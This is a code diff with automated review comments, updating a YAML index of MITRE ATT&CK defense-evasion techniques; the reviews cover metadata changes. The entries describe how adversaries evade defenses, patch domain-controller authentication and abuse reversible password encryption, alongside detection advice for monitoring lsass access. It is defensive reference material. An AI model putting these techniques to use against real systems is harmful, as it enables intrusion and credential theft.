- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS CloudTrail Search
- url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
- description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
- Retrieved June 17, 2020.
- - source_name: Azure Activity Logs
- url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
- description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
- 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.416Z'
name: Create Cloud Instance
description: |-
An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
@@ -11714,20 +11939,50 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: |-
The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
In AWS, CloudTrail logs capture the creation of an instance in the RunInstances
event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances create
to create a VM.(Citation: Cloud Audit Logs)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Instance: Instance Creation'
- 'Instance: Instance Metadata'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
+ created: '2020-05-14T14:45:15.978Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/002
+ external_id: T1578.002
+ - source_name: AWS CloudTrail Search
+ description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+ Retrieved June 17, 2020.
+ url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure Activity Logs
+ description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+ 2020.
+ url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.009:
technique:
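Review bot: the removal of `spec_version: '2.1'` at L93053 is one instance of a file-wide pattern (the same key is dropped in nearly every hunk below, e.g. L93099, L93117, L93131), and the PR description should state that this is an intentional consequence of regenerating from newer ATT&CK STIX data rather than an accidental loss. Two further points in this hunk: `x_mitre_permissions_required: - User` (L93051-L93052) is dropped with no replacement, so any consumer that filters on that field silently loses it for T1578.002, and the `|-` literal block at L93037-L93039 breaks mid-sentence after `RunInstances` and after `gcloud compute instances create`; because `|-` preserves newlines, those breaks end up in the detection string, so confirm they come from the upstream text (they look like stripped inline-code markup) and were not introduced by the generator.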
@@ -11757,7 +12012,7 @@ defense-evasion:
url: http://man7.org/linux/man-pages/man1/dd.1.html
description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
February 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-20T22:25:55.331Z'
name: Proc Memory
description: "Adversaries may inject malicious code into processes via the /proc
filesystem in order to evade process-based defenses as well as possibly elevate
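Review bot: `modified` moves backwards here, from `2021-04-29T14:49:39.188Z` to `2020-06-20T22:25:55.331Z` (L93090-L93091), and the same regression recurs for several other objects (L93108-L93109, L93122-L93123, L93527-L93528, L93542-L93543, L93567-L93568, L93585-L93586, L93606-L93607, L93636-L93637). The removed stamps all share the `14:49:39.188Z` / `14:00:00.188Z` suffix, which suggests they were bulk release stamps rather than per-object edit times, so the new values may well be the more accurate ones, but please confirm in the PR description that the source dataset is the current upstream release and not an older snapshot, since a backwards `modified` will otherwise look like a data regression to anyone diffing this index.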
@@ -11800,8 +12055,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1601.001:
technique:
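Review bot: `x_mitre_attack_spec_version: 2.1.0` is removed at L93100 and nothing in this hunk adds a replacement, so unless the key is emitted elsewhere in the T1055.009 object it ends up with no attack spec version at all. The treatment is inconsistent across the diff: T1601.001 loses the key the same way (L93118), T1622 keeps `2.1.0` (L93613), and T1578.002 is bumped to `3.2.0` (L93081). Suggest the generator either always emits the upstream value or always omits the key, and that the rule be stated in the PR description.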
@@ -11848,7 +12101,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:50:46.560Z'
name: Patch System Image
description: "Adversaries may modify the operating system of a network device
to introduce new capabilities or weaken existing defenses.(Citation: Killing
@@ -11914,12 +12167,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T22:30:01.227Z'
name: Clear Persistence
description: |-
Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)
@@ -11974,33 +12225,84 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
- T1556.001:
+ T1036.010:
technique:
- x_mitre_platforms:
- - Windows
+ modified: '2024-10-17T15:20:36.705Z'
+ name: Masquerade Account Name
+ description: "Adversaries may match or approximate the names of legitimate accounts
+ to make newly created ones appear benign. This will typically occur during
+ [Create Account](https://attack.mitre.org/techniques/T1136), although accounts
+ may also be renamed at a later date. This may also coincide with [Account
+ Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first
+ deletes an account before re-creating one with the same name.(Citation: Huntress
+ MOVEit 2023)\n\nOften, adversaries will attempt to masquerade as service accounts,
+ such as those associated with legitimate software, data backups, or container
+ cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec
+ Kubernetes Attack 2023) They may also give accounts generic, trustworthy names,
+ such as “admin”, “help”, or “root.”(Citation: Invictus IR Cloud Ransomware
+ 2024) Sometimes adversaries may model account names off of those already existing
+ in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).
+ \ \n\nNote that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656),
+ which describes impersonating specific trusted individuals or organizations,
+ rather than user or service account names. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Menachem Goldstein
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - SaaS
+ - IaaS
+ - Containers
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'User Account: User Account Creation'
type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
+ id: attack-pattern--d349c66e-18e1-4d8b-a2d7-65af7cbd2ba0
+ created: '2024-08-05T21:39:16.274Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1036/010
+ external_id: T1036.010
+ - source_name: Elastic CUBA Ransomware 2022
+ description: Daniel Stepanic, Derek Ditch, Seth Goodwin, Salim Bitam, Andrew
+ Pease. (2022, September 7). CUBA Ransomware Campaign Analysis. Retrieved
+ August 5, 2024.
+ url: https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis
+ - source_name: Invictus IR Cloud Ransomware 2024
+ description: Invictus IR. (2024, January 11). Ransomware in the cloud. Retrieved
+ August 5, 2024.
+ url: https://www.invictus-ir.com/news/ransomware-in-the-cloud
+ - source_name: Huntress MOVEit 2023
+ description: John Hammond. (2023, June 1). MOVEit Transfer Critical Vulnerability
+ CVE-2023-34362 Rapid Response. Retrieved August 5, 2024.
+ url: https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
+ - source_name: Aquasec Kubernetes Attack 2023
+ description: Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever
+ Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14,
+ 2023.
+ url: https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.001:
+ technique:
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
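Review bot: most of this hunk is churn from a change in key ordering rather than a change in content: the T1556.001 fields removed at L93136-L93137, L93165-L93167, L93182 and L93189-L93199 are re-emitted with the same values in a different order starting at L93227 (and continuing in the next hunk), with `modified`, `name` and `description` now first and `type`/`id`/`created` moved to the end. Interleaving that reorder with the genuinely new T1036.010 entry (L93134-L93224) makes it hard to see which lines are additions. Suggest either keeping the previous key order in the generator or landing the reorder as its own commit so the new technique can be reviewed in isolation; the new entry itself looks consistent with its neighbours (`x_mitre_detection: ''` at L93162 and `atomic_tests: []` at L93224 match the pattern used for other newly imported sub-techniques).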
@@ -12021,6 +12323,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -12035,22 +12338,42 @@ defense-evasion:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1027.006:
technique:
- modified: '2023-07-14T14:01:41.475Z'
+ modified: '2024-09-12T19:12:13.006Z'
name: HTML Smuggling
description: |-
Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
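Review bot: `x_mitre_permissions_required: - Administrator` is dropped for T1556.001 at L93257-L93258 with no replacement, while other objects in this diff keep the field untouched (T1601.001 at L93115-L93116, T1221 at L93533-L93534, T1564.005 at L93573-L93575). If upstream removed the field from some objects and not others, that is fine, but it should be stated in the PR description; if the generator only emits the key when it appears in a particular position in the source object, that is a bug worth fixing before merge, since downstream filtering on required permissions will otherwise return incomplete results.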
@@ -12108,48 +12431,17 @@ defense-evasion:
url: https://www.menlosecurity.com/blog/new-attack-alert-duri
- source_name: nccgroup Smuggling HTA 2017
description: Warren, R. (2017, August 8). Smuggling HTA files in Internet
- Explorer/Edge. Retrieved May 20, 2021.
- url: https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/
+ Explorer/Edge. Retrieved September 12, 2024.
+ url: https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027.006
atomic_tests: []
T1556.005:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
- type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -12171,6 +12463,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -12181,23 +12474,50 @@ defense-evasion:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1027.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T19:43:18.873Z'
name: Command Obfuscation
description: |-
Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)
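Review bot: the T1556.005 detection text at L93354-L93357 contains hard breaks before ` and Set-ADAccountControl` and before `,`; inside a double-quoted scalar these fold to single spaces, so the resulting string reads `Set-ADUser and Set-ADAccountControl , that change`, with a stray space before the comma. These are context lines, but since the object is being regenerated anyway, check whether the source text carries inline-code markup that the generator strips without collapsing whitespace. Also note that `external_references` for this object are re-sorted (the `dump_pwd_dcsync` entry moves to the front at L93386, ahead of `store_pwd_rev_enc`); the order appears to be alphabetical by description author, which is consistent with L93064-L93078 and L93202-L93219, so a one-line mention of the sort rule in the PR description would help future reviewers.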
@@ -12238,8 +12558,9 @@ defense-evasion:
url: https://attack.mitre.org/techniques/T1027/010
external_id: T1027.010
- source_name: Twitter Richard WMIC
- description: Ackroyd, R. (2023, March 24). Twitter. Retrieved March 24, 2023.
- url: https://twitter.com/rfackroyd/status/1639136000755765254
+ description: Ackroyd, R. (2023, March 24). Twitter. Retrieved September 12,
+ 2024.
+ url: https://x.com/rfackroyd/status/1639136000755765254
- source_name: Invoke-Obfuscation
description: Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved
March 17, 2023.
@@ -12275,43 +12596,23 @@ defense-evasion:
url: https://redcanary.com/threat-detection-report/techniques/powershell/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1070.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Walker Johnson
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
- created: '2020-01-31T12:35:36.479Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1070.004
- url: https://attack.mitre.org/techniques/T1070/004
- - source_name: Microsoft SDelete July 2016
- url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
- description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
- 8, 2018.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:33:59.107Z'
+ name: 'Indicator Removal on Host: File Deletion'
description: |-
Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include del
on Windows and rm
or unlink
on Linux and macOS.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Indicator Removal on Host: File Deletion'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Walker Johnson
+ x_mitre_deprecated: false
x_mitre_detection: It may be uncommon for events related to benign command-line
functions such as DEL or third-party utilities or tools to be found in an
environment, depending on the user base and how systems are typically used.
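Review bot: `name: 'Indicator Removal on Host: File Deletion'` (L93462) carries the parent technique name as a prefix, while the other sub-techniques regenerated in this diff do not (`Proc Memory` at L93092, `Patch System Image` at L93110, `Domain Controller Authentication` at L93228, `Masquerade Account Name` at L93139), and `'Hijack Execution Flow: DLL Side-Loading'` at L93638 does. Since `modified` for this object was refreshed to `2024-10-15T16:33:59.107Z` (L93461) but the name string was carried over unchanged from L93471, check whether `name` is taken from the upstream object or hand-maintained in this index, and make the prefix convention consistent either way. Separately, the `|-` description at L93465-L93468 has the same mid-sentence breaks after `del`, `rm` and `unlink` flagged for other objects above.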
@@ -12322,18 +12623,36 @@ defense-evasion:
network that an adversary could introduce. Some monitoring tools may collect
command-line arguments, but may not capture DEL commands since DEL is a native
function within cmd.exe.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Deletion'
x_mitre_defense_bypassed:
- Host forensic analysis
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
+ created: '2020-01-31T12:35:36.479Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/004
+ external_id: T1070.004
+ - source_name: Microsoft SDelete July 2016
+ description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
+ 8, 2018.
+ url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.004
atomic_tests: []
T1221:
@@ -12395,7 +12714,7 @@ defense-evasion:
description: Hanson, R. (2016, September 24). phishery. Retrieved July 21,
2018.
source_name: ryhanson phishery SEPT 2016
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-01-12T18:16:56.176Z'
name: Template Injection
description: |-
Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)
@@ -12425,13 +12744,11 @@ defense-evasion:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1221
atomic_tests: []
T1134:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.762Z'
name: Access Token Manipulation
description: |-
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -12528,7 +12845,6 @@ defense-evasion:
url: https://pentestlab.blog/2017/04/03/token-manipulation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1027.002:
technique:
@@ -12591,7 +12907,6 @@ defense-evasion:
url: https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1027.002
atomic_tests: []
T1564.005:
@@ -12629,7 +12944,7 @@ defense-evasion:
description: 'Kaspersky Lab''s Global Research and Analysis Team. (2015, February).
Equation Group: Questions and Answers. Retrieved December 21, 2015.'
url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-29T15:12:11.024Z'
name: Hidden File System
description: |-
Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
@@ -12656,8 +12971,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1055.005:
technique:
@@ -12685,7 +12998,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
